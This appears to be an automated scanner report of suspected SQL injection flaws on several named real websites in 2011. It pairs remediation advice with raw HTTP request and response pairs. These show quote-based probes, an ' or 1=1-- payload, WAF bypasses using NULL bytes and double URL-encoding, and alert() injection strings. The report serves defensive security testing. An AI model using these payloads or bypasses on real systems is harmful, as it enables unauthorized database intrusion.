SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /adsc'/d647401/46/799689/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc''/d647401/46/799689/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 231
Keep-Alive: timeout=120, max=903
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc''/d647401/46/799689/randm.js was not found on t ...[SNIP]...
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc/d724324/16/752264/randm.js%00' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:31 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc/d724324/16/752264/randm.js%00'' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:48:24 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 318
Keep-Alive: timeout=120, max=709
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc/d724324/16/752264/randm.js was not found on thi ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /adsc%2527/d724324/27/726813/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:34 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc%2527%2527/d724324/27/726813/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:34 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 235
Keep-Alive: timeout=120, max=890
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc%27%27/d724324/27/726813/randm.js was not found ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc/d724324/27%00'/752289/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:36 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc/d724324/27%00''/752289/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:36 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 213
Keep-Alive: timeout=120, max=982
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc/d724324/27 was not found on this server.</p> </ ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc/d747416/11/748729%00'/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:37 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc/d747416/11/748729%00''/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:37 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 220
Keep-Alive: timeout=120, max=902
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc/d747416/11/748729 was not found on this server. ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /adsc'/d763769/11/770950/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:39 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc''/d763769/11/770950/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:39 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 231
Keep-Alive: timeout=120, max=496
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc''/d763769/11/770950/randm.js was not found on t ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc/d793570/3%00'/793591/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:41 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc/d793570/3%00''/793591/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:41 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 212
Keep-Alive: timeout=120, max=906
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc/d793570/3 was not found on this server.</p> </b ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc%00'/d798609/10/805369/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adsc%00''/d798609/10/805369/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 202
Keep-Alive: timeout=120, max=905
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc was not found on this server.</p> </body></html ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 21150963'%20or%201%3d1--%20 and 21150963'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /archives/tips21150963'%20or%201%3d1--%20/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response 1
HTTP/1.0 500 Internal Server Error
Date: Thu, 03 Feb 2011 19:48:47 GMT
Server: Unspecified
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/
Request 2
GET /archives/tips21150963'%20or%201%3d2--%20/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response 2
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:49:06 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<meta name="keywords" content="directory advertising options, business directory marketing options, directory options, yellow pages, business directories, Spanish yellow pages, digital directories"> <meta name="description" content="Our directories complement each other to give you an unmatched reach to every audience imaginable including companion directories, bilingual and spanish directories, business to businesss (b2b) directories and digital directories."> <link rel="STYLESHEET" type="text/css" href="http://www.supermedia.com/spportal/style/sup ...[SNIP]...
1.10. http://docs.jquery.com/UI/Dialog [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://docs.jquery.com
Path: /UI/Dialog
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /UI/Dialog?1%2527=1 HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:07:57 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14991
Request 2
GET /UI/Dialog?1%2527%2527=1 HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:08:53 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="con ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /15/182221'/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 21:48:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5453
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; path=/
Cache-control: private
Request 2
GET /15/182221''/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11282
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=MHEEKNBBLHOHJNHBIPNHJKNL; path=/
Cache-control: private
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /15/182221/abc-development-inc/chicago.aspx/x22' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 21:48:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1369
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=CJEEKNBBDCJDLMEACLODNOPI; path=/
Cache-control: private
Request 2
GET /15/182221/abc-development-inc/chicago.aspx/x22'' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11302
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=EJEEKNBBLAHNPDBHLMHJLNKM; path=/
Cache-control: private
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /15/182221'/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us
Response 1
HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5859
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=NIMOGJOBDKLPJKOOCEPBMLJI; path=/
Cache-control: private
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /15/182221/abc-development-inc/chicago.aspx/x22'/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us
Response 1
HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1495
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=BNMOGJOBONCKHCHLACPLEBGD; path=/
Cache-control: private
The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns'=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us
Response 1
HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1495
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=DPMOGJOBNNLPMDCLNBMEICJC; path=/
Cache-control: private
The CstrStatus cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CstrStatus cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
